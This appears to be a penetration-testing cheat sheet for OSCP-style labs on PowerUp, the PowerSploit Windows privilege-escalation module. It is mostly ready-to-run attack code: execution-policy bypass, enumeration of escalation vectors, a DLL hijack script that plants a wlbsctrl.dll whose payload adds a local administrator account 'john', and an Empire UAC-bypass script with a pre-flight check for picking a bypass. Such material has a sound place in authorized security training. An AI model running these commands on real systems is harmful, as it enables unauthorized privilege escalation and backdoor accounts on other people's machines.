PowerUp

PowerUp is the privilege-escalation module of PowerSploit (Privesc/PowerUp.ps1) and is also bundled with the PowerShell Empire framework. It aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations: writable service binaries and service DACLs, unquoted service paths, modifiable PATH directories and DLL hijacks, AlwaysInstallElevated, autologon credentials and similar.

Officially allowed during the OSCP exam according to the OSCP Exam FAQ (part of PowerShell Empire, which is allowed).

Usage

powershell -exec bypass
Import-Module .\PowerUp.ps1

Location on Kali Linux

/usr/share/windows-resources/powersploit/Privesc/PowerUp.ps1

Upload the PowerUp script to the victim machine. See File Transfer.

Execute all checks

Runs every check and prints each finding together with the AbuseFunction that exploits it, where PowerUp ships one. Pipe through Out-String -Width 4096 so long paths and commands are not truncated at the console width. The -HTMLReport flag additionally writes the report to COMPUTERNAME.username.html in the current directory.

powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks | Out-String -Width 4096}"
Invoke-AllChecks | Out-String -Width 4096
Invoke-AllChecks -HTMLReport
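The following is an added example, not code from PowerUp or this page's author: it keeps the result objects from Invoke-AllChecks instead of only the console rendering, so the findings can be summarised and the abuse functions reviewed before anything is executed. It assumes the PowerSploit copy of PowerUp.ps1, in which each finding carries a Check property and exploitable findings carry an AbuseFunction string; the individual check function names at the end (Get-UnquotedService and friends) are the PowerSploit-version exports.

```powershell
# From cmd.exe:  powershell -exec bypass
Import-Module .\PowerUp.ps1

# Capture the result objects rather than only the console rendering. The PowerSploit
# copy of Invoke-AllChecks also emits "[*] Checking ..." progress strings into the
# pipeline, so drop anything that is not an object.
$findings = @(Invoke-AllChecks | Where-Object { $_ -isnot [string] })

# Full text on disk, un-truncated, for the report.
$findings | Out-String -Width 4096 | Out-File .\powerup-all.txt

# Summary by check category. 'Check' is the property name the PowerSploit version
# attaches to each finding (assumption: adjust if your copy names it differently).
$findings | Group-Object -Property Check | Sort-Object Count -Descending |
    Select-Object Count, Name | Format-Table -AutoSize

# Findings PowerUp can exploit for you carry an AbuseFunction string. List them rather
# than invoking them blindly: those functions add users, rewrite service binaries and
# restart services, which is noisy and needs cleanup afterwards.
$abusable = $findings | Where-Object {
    $_.PSObject.Properties['AbuseFunction'] -and $_.AbuseFunction
}
$abusable | Select-Object Check, AbuseFunction | Format-Table -Wrap

# Re-run just one class of check when that is all you need. Each of these is an
# exported PowerUp function, so they work without Invoke-AllChecks.
Get-UnquotedService | Format-List              # service binary path unquoted and containing spaces
Get-ModifiableServiceFile | Format-List        # service binary or its directory writable by us
Get-RegistryAlwaysInstallElevated              # MSI packages install as SYSTEM
```

Invoke-AllChecks is the noisy, run-once enumeration; once you know which vector you are going after, calling the specific check function directly is faster and writes less to the target.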

DLL Hijacking

Finds possible hijackable DLL locations in PATH

Finds all directories in the system %PATH% that are modifiable by the current user.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Find-PathDLLHijack

Finds DLL hijack locations for running processes

Finds possible hijackable DLL locations for all processes.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Find-ProcessDLLHijack | Out-String -Width 4096

Finds possible hijackable DLL locations for a specific process.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Get-Process "msedge" | Find-ProcessDLLHijack | Out-String -Width 4096 > results.txt

Generate a DLL file

Write-HijackDll [-DllPath] <String> [[-Architecture] <String>] [[-BatPath] <String>] [[-UserName] <String>] [[-Password] <String>] [[-LocalGroup] <String>] [[-Credential] <PSCredential>] [[-Command] <String>]

Without -Command, the generated DLL's payload adds a local account to the Administrators group (adjust with -UserName, -Password and -LocalGroup); pass -Command to run something else instead. -Architecture must match the bitness of the process that will load the DLL, not of the PowerShell host you are running in.

powershell -exec bypass
Import-Module .\PowerUp.ps1
Write-HijackDll -DllPath 'C:\Users\<somepath>\<somedll>.dll'

wlbsctrl.dll – see Phantom DLL Hijacking

The IKEEXT service looks for wlbsctrl.dll along %PATH% when it starts, and %LOCALAPPDATA%\Microsoft\WindowsApps is on the user's PATH by default, so a DLL planted there only needs the directory to be writable. Nothing runs until IKEEXT next starts (service restart or reboot).

powershell -exec bypass
Import-Module .\PowerUp.ps1
Write-HijackDll -DllPath 'C:\Users\<username>\AppData\Local\Microsoft\WindowsApps\wlbsctrl.dll'
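The following is an added example that ties the Find-PathDLLHijack, Find-ProcessDLLHijack and Write-HijackDll steps above into one verified sequence; it is not code from PowerUp or from this page's author. It assumes PowerUp.ps1 is in the working directory and that Find-PathDLLHijack returns objects with ModifiablePath, IdentityReference and Permissions properties (the PowerSploit-version names). The DLL name is the wlbsctrl.dll phantom DLL from the section above; the account name and password in the -Command string are placeholders.

```powershell
# From cmd.exe:  powershell -exec bypass
Import-Module .\PowerUp.ps1

# 1. PATH entries the current user can modify, as PowerUp reports them.
$listed = @(Find-PathDLLHijack)
$listed | Format-Table ModifiablePath, IdentityReference, Permissions -AutoSize

# 2. Prove each one by actually writing and deleting a file. ACL listings can mislead
#    (inherited deny entries, a parent directory that blocks traversal), and a plant
#    you cannot actually perform is a wasted, logged step.
$confirmed = @(
    foreach ($dir in ($listed | Select-Object -ExpandProperty ModifiablePath -Unique)) {
        $probe = Join-Path $dir ([guid]::NewGuid().ToString('N') + '.tmp')
        try {
            [IO.File]::WriteAllText($probe, '')
            Remove-Item -LiteralPath $probe -Force
            $dir.TrimEnd('\')
        } catch {
            Write-Warning "Listed as modifiable but the write failed: $dir ($($_.Exception.Message))"
        }
    }
)
"Confirmed writable PATH directories: $($confirmed.Count)"

# 3. Position in %PATH% matters: the loader walks the entries left to right, so a DLL in
#    an earlier entry shadows the same name in a later one. (System32 is searched before
#    PATH at all, so a DLL that really exists there cannot be shadowed this way; that is
#    why the phantom, non-existent wlbsctrl.dll is the useful target.)
$order = @(($env:PATH -split ';') | Where-Object { $_ } | ForEach-Object { $_.TrimEnd('\') })
for ($i = 0; $i -lt $order.Count; $i++) {
    if ($confirmed -contains $order[$i]) { '{0,3}  {1}' -f $i, $order[$i] }
}

# 4. Which running processes load DLLs that could be served from a modifiable location.
Find-ProcessDLLHijack | Out-String -Width 4096 | Out-File .\process-dll-hijack.txt

# 5. Generate the DLL into the first confirmed directory under the phantom name.
#    -Command replaces Write-HijackDll's default add-a-local-admin payload so the side
#    effect is explicit; pass -Architecture if the loading process's bitness differs
#    from this PowerShell host's (see Get-Command Write-HijackDll -Syntax for values).
if ($confirmed.Count -gt 0) {
    $target = Join-Path $confirmed[0] 'wlbsctrl.dll'
    Write-HijackDll -DllPath $target `
        -Command 'net user john Password123! /add && net localgroup Administrators john /add'
    Get-Item -LiteralPath $target | Select-Object FullName, Length, LastWriteTime
}
# The payload fires when the IKEEXT service next starts (service restart or reboot).
# Remove the DLL, the batch file and the created account once you are done.
```

Step 2 is the check that saves the most time in practice: PowerUp's ACL parsing is good, but a directory that is "writable" on paper and not in fact is common on hardened builds, and the probe costs nothing.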

Invoke-WScriptBypassUAC.ps1

Official Documentation.

Did not work (was not applicable to target tested).

cp /usr/share/powershell-empire/empire/server/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1 /home/kali/share
copy \\x.x.x.x\myshare\Invoke-WScriptBypassUAC.ps1 Invoke-WScriptBypassUAC.ps1
# Either relax the policy for the current user (persistent change on the target) ...
powershell Set-ExecutionPolicy -ExecutionPolicy Unrestricted -Scope CurrentUser
# ... or, preferably, just start a shell that ignores it:
# powershell.exe -exec bypass
# The file only defines a function; dot-source it into the session, then call the function.
# Running ".\Invoke-WScriptBypassUAC.ps1 <args>" directly loads the function and does nothing else.
. .\Invoke-WScriptBypassUAC.ps1
# Empire's copy names the parameter -payload; confirm with: Get-Command Invoke-WScriptBypassUAC -Syntax
Invoke-WScriptBypassUAC -payload cmd.exe
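Before trying any UAC bypass it is worth establishing whether one even applies: a bypass only helps when the current user is a member of Administrators, the token is filtered to Medium integrity, and UAC is actually enforcing a prompt. The following is an added pre-flight check, not part of Invoke-WScriptBypassUAC or this page's author's notes. It relies only on whoami, the UAC policy registry keys and WMI, and is written to run on Windows PowerShell 2.0 as well as later versions; the Windows 7 (6.1) test reflects that the wscript.exe manifest trick the Empire script uses applies to Windows 7.

```powershell
function Test-UacBypassApplies {
    # Token groups and the integrity label, as whoami reports them (CSV is stable to parse).
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $label  = ($groups | Where-Object { $_.Type -eq 'Label' }).'Group Name'   # e.g. "Mandatory Label\Medium Mandatory Level"
    $admin  = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }            # BUILTIN\Administrators

    # UAC policy. EnableLUA=0 means UAC is off; ConsentPromptBehaviorAdmin=0 means
    # administrators elevate silently, so a plain "RunAs" already gives a High token.
    $pol = Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    $os  = [version](Get-WmiObject Win32_OperatingSystem).Version

    $uacOn    = ($pol.EnableLUA -eq 1)
    $filtered = [bool]($admin -and $admin.Attributes -match 'deny only')   # admin SID present but "used for deny only"

    $verdict =
        if ($label -match 'High|System') { 'Already elevated: nothing to bypass' }
        elseif (-not $admin) { 'Not in Administrators: a UAC bypass cannot help; use the PowerUp service/DLL vectors instead' }
        elseif (-not $uacOn -or $pol.ConsentPromptBehaviorAdmin -eq 0) { 'UAC off or silent elevation: Start-Process cmd.exe -Verb RunAs is enough' }
        elseif ($os.Major -eq 6 -and $os.Minor -eq 1) { 'Filtered admin token on Windows 7: Invoke-WScriptBypassUAC applies' }
        else { 'Filtered admin token, but the wscript.exe manifest trick is Windows 7 only; pick a bypass for this build' }

    New-Object PSObject -Property @{
        IntegrityLevel             = $label
        LocalAdminGroup            = [bool]$admin
        TokenFiltered              = $filtered
        UacEnabled                 = $uacOn
        ConsentPromptBehaviorAdmin = $pol.ConsentPromptBehaviorAdmin
        OSVersion                  = $os
        Verdict                    = $verdict
    }
}

Test-UacBypassApplies | Format-List
```

The "Already elevated" and "Not in Administrators" branches are the ones that matter most on an exam box: in the first case a bypass is wasted effort and in the second it cannot succeed regardless of technique, which is what "not applicable to target tested" usually turns out to mean.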
